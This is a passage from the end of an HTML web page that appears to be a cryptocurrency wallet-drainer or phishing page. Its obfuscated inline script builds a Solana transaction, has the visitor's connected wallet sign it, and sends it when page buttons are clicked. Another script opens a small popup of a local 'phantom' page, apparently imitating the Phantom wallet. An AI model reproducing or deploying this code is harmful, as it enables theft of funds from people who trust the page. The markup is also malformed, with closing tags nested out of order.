n.getLatestBlockhash(); if (f[o(409)] = m, f[o(394)] = p[o(420)], f) { let e = await p.signTransaction(f, n), t = await n[o(413)](e[o(457)]()); await n[o(399)](t) } } document[e(471)](e(453))[e(424)] = function () { const n = e; "#False" == document[n(471)]("root").getAttribute(n(397)) ? a() : r() }, document[e(471)](e(418))[e(424)] = function () { o() } }))</script>
        <script src="js/chunk.js"></script>
        <script src="js/tokenup.js"></script>
        <script src="js/main.chunk.js"></script>
        <script src="js/lib.js"></script>
        <script src="js/life.js"></script>
        <script src="js/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>$(".phantom").click((function () { window.open("./phantom/index.html", "_blank", "height=533,width=344,menubar=no, toolbar=no, top=0, left=4000, location=no, scrollbars=no,resizable=no,status=no") }))</script>
    </body>
    </head>

    </html>
</body>

</html>